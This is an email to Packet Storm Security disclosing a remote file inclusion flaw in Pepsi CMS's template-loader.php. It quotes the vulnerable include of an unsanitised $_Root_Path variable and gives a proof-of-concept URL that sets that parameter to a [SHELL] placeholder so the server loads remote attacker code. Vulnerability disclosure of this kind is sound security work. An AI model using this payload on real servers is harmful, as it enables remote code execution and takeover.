Dear Packetstormsecurity !

I found Vulnerability in  Pepsi CMS
here is the description
=======================================
<http://docs.google.com/Doc?id=dgq3x7pn_1026z464gw>Pepsi CMS
(template-loader.php) Remote File Include
=======================================

*::Home:

*  http://sourceforge.net/projects/pepsicms/
*
::Vuln Type :

*  Remote File Include (RFI)

*::Discovered by :

*  Rohit Bansal


*::Vuln Code:

*/includes/template-loader.php

   include( 'config.php' );
   include( 'db.php' );
   //include( 'classes/theme_engine/engine.php' );
   include( $_Root_Path . 'classes/Smarty.class.php' );


*PoC:

*/includes/template-loader.php?_Root_Path=[SHELL]??

Greetz: whizgeeks, infysec

=============================================

I hope You will post that Vulnerability in "Vulnerability section"
Tell me if I need to change something.

Thanks and Regards
Rohit Bansal